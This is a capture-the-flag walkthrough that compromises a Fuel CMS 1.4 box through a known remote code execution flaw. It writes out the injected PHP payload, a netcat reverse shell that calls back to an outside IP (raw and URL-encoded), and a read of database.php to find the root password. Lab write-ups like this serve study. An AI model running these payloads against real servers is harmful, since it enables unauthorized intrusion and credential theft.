Introduction

A new start-up has a few issues with their web server.

This is another easy rated box. Let’s begin.

Ports

nmap says we’ve got 80 (HTTP); I originally cancelled this scan about 60% in since it was running slowly. Later I ran it again in case there was something I’d missed, but no. So it’s web all the way.

Webserver

The front page of the website shows it is running a fresh install of Fuel CMS version 1.4 and even shows the default credentials are admin:admin.

Checking searchsploit, there is an RCE vulnerability in Fuel version 1.4.1, so that looks promising. There is no metasploit module, but a python (2) script.

Payload

The payload from the script is essentially:

/fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27COMMAND_HERE%27%29%2b%27

Where the words COMMAND_HERE are replaced with the command you want to execute, such as pwd, whoami, ls etc.

Shell

The pentest monkey alternative netcat shell works fine, provided it is URL encoded (ctrl+u in Burp Suite).

So:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1234 >/tmp/f

when URL encoded and inserted into the payload becomes

/fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f%27%29%2b%27

We start our listener and send this with Burp Repeater; we’re in as www-data and can read the user flag.

Root

I spent what felt like quite a bit of time looking for some vulnerability in the server, but ultimately I couldn’t find one. That means we needs credentials - essentially the password for root.

Spoiler alert: This can be found in:

www-data@ubuntu:/var/www/html/fuel/application/config$ cat database.php

Once you’ve got it, it’s su root and that’s it.